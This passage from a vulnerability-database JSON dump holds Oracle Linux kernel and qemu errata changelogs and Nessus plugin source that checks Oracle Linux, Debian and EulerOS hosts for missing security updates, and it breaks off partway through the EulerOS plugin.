{CVE-2018-3639}\n- [x86] bugs: Expose the /sys/../spec_store_bypass and X86_BUG_SPEC_STORE_BYPASS (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] include: add latest intel-family.h from RHEL6 (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] bugs: Read SPEC_CTRL MSR during boot and re-use reserved bits (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] spec_ctrl: Use separate PCP variables for IBRS entry and exit (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] cpuid: Fix up IBRS/IBPB/STIBP feature bits on Intel (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] cpufeatures: Clean up Spectre v2 related CPUID flags (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] cpufeatures: Add AMD feature bits for Speculation Control (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] cpufeatures: Add Intel feature bits for Speculation (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] cpu: Add driver auto probing for x86 features (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- 2.6.18-419.0.0.0.11\n- x86_64/entry: Don't use IST entry for #BP stack [orabug 28452062] {CVE-2018-8897}\n- 2.6.18-419.0.0.0.10\n- Backport CVE-2017-5715 to RHCK/OL5 [orabug 27787723]\n- 2.6.18-419.0.0.0.9\n- rebuild with retpoline compiler\n- 2.6.18-419.0.0.0.8\n- Backport CVEs to RHCK/OL5 [orabug 27547712] {CVE-2017-5753} {CVE-2017-5754}\n- 2.6.18-419.0.0.0.5\n- [fs] fix kernel panic on boot on ia64 guests (Honglei Wang) [orabug 26934100]\n- 2.6.18-419.0.0.0.4\n- [fs] fix bug in loading of PIE binaries (Michael Davidson) [orabug 26916951] {CVE-2017-1000253}\n- 2.6.18-419.0.0.0.3\n- nfsd: stricter decoding of write-like NFSv2/v3 ops (J. 
Bruce Fields) [orabug 26586706] {CVE-2017-7895}", "modified": "2019-08-04T00:00:00", "published": "2019-08-04T00:00:00", "id": "ELSA-2019-4732", "href": "http://linux.oracle.com/errata/ELSA-2019-4732.html", "title": "kernel security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-11T06:46:07", "bulletinFamily": "unix", "description": "[15:3.1.0-5.el7]\n- Only enable the halt poll control MSR if it is supported by the host (Mark\n Kanda) [Orabug: 29946722]\n[15:3.1.0-4.el7]\n- kvm: i386: halt poll control MSR support (Marcelo Tosatti) [Orabug: 29933278]\n- Document CVEs as fixed: CVE-2017-9524, CVE-2017-6058, CVE-2017-5931 (Mark Kanda) [Orabug: 29886908] {CVE-2017-5931} {CVE-2017-6058} {CVE-2017-9524}\n- pvrdma: release device resources in case of an error (Prasad J Pandit) [Orabug: 29056678] {CVE-2018-20123}\n- qxl: check release info object (Prasad J Pandit) [Orabug: 29886906] {CVE-2019-12155}\n- target/i386: add MDS-NO feature (Paolo Bonzini) [Orabug: 29820428] {CVE-2018-12126} {CVE-2018-12127} {CVE-2018-12130} {CVE-2019-11091}\n- docs: recommend use of md-clear feature on all Intel CPUs (Daniel P. 
Berrange) [Orabug: 29820428] {CVE-2018-12126} {CVE-2018-12127} {CVE-2018-12130} {CVE-2019-11091}\n- target/i386: define md-clear bit (Paolo Bonzini) [Orabug: 29820428] {CVE-2018-12126} {CVE-2018-12127} {CVE-2018-12130} {CVE-2019-11091}\n- pvh: block migration if booting using PVH (Liam Merwick) [Orabug: 29796676]\n- hw/i386/pc: run the multiboot loader before the PVH loader (Stefano Garzarella) [Orabug: 29796676]\n- optionrom/pvh: load initrd from fw_cfg (Stefano Garzarella) [Orabug: 29796676]\n- hw/i386/pc: use PVH option rom (Stefano Garzarella) [Orabug: 29796676]\n- qemu.spec: add pvh.bin to %files (Liam Merwick) [Orabug: 29796676]\n- optionrom: add new PVH option rom (Stefano Garzarella) [Orabug: 29796676]\n- linuxboot_dma: move common functions in a new header (Stefano Garzarella) [Orabug: 29796676]\n- linuxboot_dma: remove duplicate definitions of FW_CFG (Stefano Garzarella) [Orabug: 29796676]\n- pvh: load initrd and expose it through fw_cfg (Stefano Garzarella) [Orabug: 29796676]\n- pvh: Boot uncompressed kernel using direct boot ABI (Liam Merwick) [Orabug: 29796676]\n- pvh: Add x86/HVM direct boot ABI header file (Liam Merwick) [Orabug: 29796676]\n- elf-ops.h: Add get_elf_note_type() (Liam Merwick) [Orabug: 29796676]\n- elf: Add optional function ptr to load_elf() to parse ELF notes (Liam Merwick) [Orabug: 29796676]", "modified": "2019-07-10T00:00:00", "published": "2019-07-10T00:00:00", "id": "ELSA-2019-4713", "href": "http://linux.oracle.com/errata/ELSA-2019-4713.html", "title": "qemu security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2019-11-01T03:18:34", "bulletinFamily": "scanner", "description": "Description of changes:\n\n[15:3.1.0-5.el7]\n- Only enable the halt poll control MSR if it is supported by the host (Mark\nKanda) [Orabug: 29946722]\n\n[15:3.1.0-4.el7]\n- kvm: i386: halt poll control MSR support (Marcelo Tosatti) [Orabug: \n29933278]\n- Document CVEs as fixed: 
CVE-2017-9524, CVE-2017-6058, CVE-2017-5931 \n(Mark Kanda) [Orabug: 29886908] {CVE-2017-5931} {CVE-2017-6058} \n{CVE-2017-9524}\n- pvrdma: release device resources in case of an error (Prasad J Pandit) \n[Orabug: 29056678] {CVE-2018-20123}\n- qxl: check release info object (Prasad J Pandit) [Orabug: 29886906] \n{CVE-2019-12155}\n- target/i386: add MDS-NO feature (Paolo Bonzini) [Orabug: 29820428] \n{CVE-2018-12126} {CVE-2018-12127} {CVE-2018-12130} {CVE-2019-11091}\n- docs: recommend use of md-clear feature on all Intel CPUs (Daniel P. \nBerrangé ) [Orabug: 29820428] {CVE-2018-12126} {CVE-2018-12127} \n{CVE-2018-12130} {CVE-2019-11091}\n- target/i386: define md-clear bit (Paolo Bonzini) [Orabug: 29820428] \n{CVE-2018-12126} {CVE-2018-12127} {CVE-2018-12130} {CVE-2019-11091}\n- pvh: block migration if booting using PVH (Liam Merwick) [Orabug: \n29796676]\n- hw/i386/pc: run the multiboot loader before the PVH loader (Stefano \nGarzarella) [Orabug: 29796676]\n- optionrom/pvh: load initrd from fw_cfg (Stefano Garzarella) [Orabug: \n29796676]\n- hw/i386/pc: use PVH option rom (Stefano Garzarella) [Orabug: 29796676]\n- qemu.spec: add pvh.bin to %files (Liam Merwick) [Orabug: 29796676]\n- optionrom: add new PVH option rom (Stefano Garzarella) [Orabug: 29796676]\n- linuxboot_dma: move common functions in a new header (Stefano \nGarzarella) [Orabug: 29796676]\n- linuxboot_dma: remove duplicate definitions of FW_CFG (Stefano \nGarzarella) [Orabug: 29796676]\n- pvh: load initrd and expose it through fw_cfg (Stefano Garzarella) \n[Orabug: 29796676]\n- pvh: Boot uncompressed kernel using direct boot ABI (Liam Merwick) \n[Orabug: 29796676]\n- pvh: Add x86/HVM direct boot ABI header file (Liam Merwick) [Orabug: \n29796676]\n- elf-ops.h: Add get_elf_note_type() (Liam Merwick) [Orabug: 29796676]\n- elf: Add optional function ptr to load_elf() to parse ELF notes (Liam \nMerwick) [Orabug: 29796676]", "modified": "2019-11-02T00:00:00", "id": "ORACLELINUX_ELSA-2019-4713.NASL", "href": 
"https://www.tenable.com/plugins/nessus/126673", "published": "2019-07-15T00:00:00", "title": "Oracle Linux 7 : qemu (ELSA-2019-4713) (MDSUM/RIDL) (MFBDS/RIDL/ZombieLoad) (MLPDS/RIDL) (MSBDS/Fallout)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2019-4713.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(126673);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/09/27 13:00:40\");\n\n script_cve_id(\"CVE-2017-5931\", \"CVE-2017-6058\", \"CVE-2017-9524\", \"CVE-2018-12126\", \"CVE-2018-12127\", \"CVE-2018-12130\", \"CVE-2018-20123\", \"CVE-2019-11091\", \"CVE-2019-12155\");\n\n script_name(english:\"Oracle Linux 7 : qemu (ELSA-2019-4713) (MDSUM/RIDL) (MFBDS/RIDL/ZombieLoad) (MLPDS/RIDL) (MSBDS/Fallout)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[15:3.1.0-5.el7]\n- Only enable the halt poll control MSR if it is supported by the host (Mark\nKanda) [Orabug: 29946722]\n\n[15:3.1.0-4.el7]\n- kvm: i386: halt poll control MSR support (Marcelo Tosatti) [Orabug: \n29933278]\n- Document CVEs as fixed: CVE-2017-9524, CVE-2017-6058, CVE-2017-5931 \n(Mark Kanda) [Orabug: 29886908] {CVE-2017-5931} {CVE-2017-6058} \n{CVE-2017-9524}\n- pvrdma: release device resources in case of an error (Prasad J Pandit) \n[Orabug: 29056678] {CVE-2018-20123}\n- qxl: check release info object (Prasad J Pandit) [Orabug: 29886906] \n{CVE-2019-12155}\n- target/i386: add MDS-NO feature (Paolo Bonzini) [Orabug: 29820428] \n{CVE-2018-12126} {CVE-2018-12127} {CVE-2018-12130} {CVE-2019-11091}\n- docs: recommend use of md-clear feature on all Intel CPUs (Daniel P. 
\nBerrangé ) [Orabug: 29820428] {CVE-2018-12126} {CVE-2018-12127} \n{CVE-2018-12130} {CVE-2019-11091}\n- target/i386: define md-clear bit (Paolo Bonzini) [Orabug: 29820428] \n{CVE-2018-12126} {CVE-2018-12127} {CVE-2018-12130} {CVE-2019-11091}\n- pvh: block migration if booting using PVH (Liam Merwick) [Orabug: \n29796676]\n- hw/i386/pc: run the multiboot loader before the PVH loader (Stefano \nGarzarella) [Orabug: 29796676]\n- optionrom/pvh: load initrd from fw_cfg (Stefano Garzarella) [Orabug: \n29796676]\n- hw/i386/pc: use PVH option rom (Stefano Garzarella) [Orabug: 29796676]\n- qemu.spec: add pvh.bin to %files (Liam Merwick) [Orabug: 29796676]\n- optionrom: add new PVH option rom (Stefano Garzarella) [Orabug: 29796676]\n- linuxboot_dma: move common functions in a new header (Stefano \nGarzarella) [Orabug: 29796676]\n- linuxboot_dma: remove duplicate definitions of FW_CFG (Stefano \nGarzarella) [Orabug: 29796676]\n- pvh: load initrd and expose it through fw_cfg (Stefano Garzarella) \n[Orabug: 29796676]\n- pvh: Boot uncompressed kernel using direct boot ABI (Liam Merwick) \n[Orabug: 29796676]\n- pvh: Add x86/HVM direct boot ABI header file (Liam Merwick) [Orabug: \n29796676]\n- elf-ops.h: Add get_elf_note_type() (Liam Merwick) [Orabug: 29796676]\n- elf: Add optional function ptr to load_elf() to parse ELF notes (Liam \nMerwick) [Orabug: 29796676]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2019-July/008891.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected qemu packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:qemu\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:oracle:linux:qemu-block-gluster\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:qemu-block-iscsi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:qemu-block-rbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:qemu-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:qemu-img\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:qemu-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:qemu-kvm-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:qemu-system-x86\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:qemu-system-x86-core\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/07/15\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"qemu-3.1.0-5.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"qemu-block-gluster-3.1.0-5.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"qemu-block-iscsi-3.1.0-5.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"qemu-block-rbd-3.1.0-5.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"qemu-common-3.1.0-5.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", 
reference:\"qemu-img-3.1.0-5.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"qemu-kvm-3.1.0-5.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"qemu-kvm-core-3.1.0-5.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"qemu-system-x86-3.1.0-5.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"qemu-system-x86-core-3.1.0-5.el7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qemu / qemu-block-gluster / qemu-block-iscsi / qemu-block-rbd / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:24:46", "bulletinFamily": "scanner", "description": "Two vulnerabilities were discovered in Libvirt, a virtualisation\nabstraction library, allowing an API client with read-only permissions\nto execute arbitrary commands via the virConnectGetDomainCapabilities\nAPI, or read or execute arbitrary files via the\nvirDomainSaveImageGetXMLDesc API.\n\nAdditionally the libvirt", "modified": "2019-11-02T00:00:00", "id": "DEBIAN_DSA-4469.NASL", "href": "https://www.tenable.com/plugins/nessus/126128", "published": "2019-06-24T00:00:00", "title": "Debian DSA-4469-1 : libvirt - security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4469. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(126128);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/08/12 17:35:38\");\n\n script_cve_id(\"CVE-2019-10161\", \"CVE-2019-10167\");\n script_xref(name:\"DSA\", value:\"4469\");\n\n script_name(english:\"Debian DSA-4469-1 : libvirt - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Two vulnerabilities were discovered in Libvirt, a virtualisation\nabstraction library, allowing an API client with read-only permissions\nto execute arbitrary commands via the virConnectGetDomainCapabilities\nAPI, or read or execute arbitrary files via the\nvirDomainSaveImageGetXMLDesc API.\n\nAdditionally the libvirt's cpu map was updated to make addressing\nCVE-2018-3639, CVE-2017-5753, CVE-2017-5715, CVE-2018-12126,\nCVE-2018-12127, CVE-2018-12130 and CVE-2019-11091 easier by supporting\nthe md-clear, ssbd, spec-ctrl and ibpb CPU features when picking CPU\nmodels without having to fall back to host-passthrough.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-3639\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-5753\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-5715\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-12126\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-12127\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://security-tracker.debian.org/tracker/CVE-2018-12130\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-11091\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/libvirt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/libvirt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2019/dsa-4469\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the libvirt packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 3.0.0-4+deb9u4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libvirt\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/07/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"libnss-libvirt\", reference:\"3.0.0-4+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libvirt-clients\", reference:\"3.0.0-4+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libvirt-daemon\", reference:\"3.0.0-4+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libvirt-daemon-system\", reference:\"3.0.0-4+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libvirt-dev\", reference:\"3.0.0-4+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libvirt-doc\", reference:\"3.0.0-4+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libvirt-sanlock\", reference:\"3.0.0-4+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libvirt0\", reference:\"3.0.0-4+deb9u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:07:34", "bulletinFamily": "scanner", "description": "According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - A flaw was found in the Linux kernel", "modified": "2019-11-02T00:00:00", "id": "EULEROS_SA-2019-1586.NASL", "href": 
"https://www.tenable.com/plugins/nessus/125513", "published": "2019-05-29T00:00:00", "title": "EulerOS 2.0 SP2 : kernel (EulerOS-SA-2019-1586)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125513);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/06/27 13:33:26\");\n\n script_cve_id(\n \"CVE-2017-13168\",\n \"CVE-2018-10877\",\n \"CVE-2018-12126\",\n \"CVE-2018-12127\",\n \"CVE-2018-12130\",\n \"CVE-2018-16884\",\n \"CVE-2018-9422\",\n \"CVE-2018-9516\",\n \"CVE-2019-11091\",\n \"CVE-2019-11190\",\n \"CVE-2019-3874\",\n \"CVE-2019-6133\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : kernel (EulerOS-SA-2019-1586)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - A flaw was found in the Linux kernel's NFS41+\n subsystem. NFS41+ shares mounted in different network\n namespaces at the same time can make bc_svc_process()\n use wrong back-channel IDs and cause a use-after-free\n vulnerability. Thus a malicious container user can\n cause a host kernel memory corruption and a system\n panic. Due to the nature of the flaw, privilege\n escalation cannot be fully ruled out.(CVE-2018-16884)\n\n - An elevation of privilege vulnerability in the kernel\n scsi driver. Product: Android. Versions: Android\n kernel. 
Android ID A-65023233.(CVE-2017-13168)\n\n - A flaw in the load_elf_binary() function in the Linux\n kernel allows a local attacker to leak the base address\n of .text and stack sections for setuid binaries and\n bypass ASLR because install_exec_creds() is called too\n late in this function.(CVE-2019-11190)\n\n - The SCTP socket buffer used by a userspace application\n is not accounted by the cgroups subsystem. An attacker\n can use this flaw to cause a denial of service\n attack.(CVE-2019-3874)\n\n - A flaw was found in the Linux kernel ext4 filesystem.\n An out-of-bound access is possible in the\n ext4_ext_drop_refs() function when operating on a\n crafted ext4 filesystem image.(CVE-2018-10877)\n\n - Non-optimized code for key handling of shared futexes\n was found in the Linux kernel in the form of unbounded\n contention time due to the page lock for real-time\n users. Before the fix, the page lock was an\n unnecessarily heavy lock for the futex path that\n protected too much. After the fix, the page lock is\n only required in a specific corner case.(CVE-2018-9422)\n\n - A flaw was found in the Linux kernel in the\n hid_debug_events_read() function in the\n drivers/hid/hid-debug.c file. A lack of the certain\n checks may allow a privileged user ('root') to achieve\n an out-of-bounds write and thus receiving user space\n buffer corruption.(CVE-2018-9516)\n\n - A vulnerability was found in polkit. When\n authentication is performed by a non-root user to\n perform an administrative task, the authentication is\n temporarily cached in such a way that a local attacker\n could impersonate the authorized process, thus gaining\n access to elevated privileges.(CVE-2019-6133)\n\n - A flaw was found in the implementation of the 'fill\n buffer', a mechanism used by modern CPUs when a\n cache-miss is made on L1 CPU cache. 
If an attacker can\n generate a load operation that would create a page\n fault, the execution will continue speculatively with\n incorrect data from the fill buffer while the data is\n fetched from higher level caches. This response time\n can be measured to infer data in the fill buffer.\n (CVE-2018-12130)\n\n - Modern Intel microprocessors implement hardware-level\n micro-optimizations to improve the performance of\n writing data back to CPU caches. The write operation is\n split into STA (STore Address) and STD (STore Data)\n sub-operations. These sub-operations allow the\n processor to hand-off address generation logic into\n these sub-operations for optimized writes. Both of\n these sub-operations write to a shared distributed\n processor structure called the 'processor store\n buffer'. As a result, an unprivileged attacker could\n use this flaw to read private data resident within the\n CPU's processor store buffer. (CVE-2018-12126)\n\n - Microprocessors use a 'load port' subcomponent to\n perform load operations from memory or IO. During a\n load operation, the load port receives data from the\n memory or IO subsystem and then provides the data to\n the CPU registers and operations in the CPU's\n pipelines. Stale load operations results are stored in\n the 'load port' table until overwritten by newer\n operations. Certain load-port operations triggered by\n an attacker can be used to reveal data about previous\n stale requests leaking data back to the attacker via a\n timing side-channel. (CVE-2018-12127)\n\n - Uncacheable memory on some microprocessors utilizing\n speculative execution may allow an authenticated user\n to potentially enable information disclosure via a side\n channel with local access. (CVE-2019-11091)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1586\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?78581b48\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n 
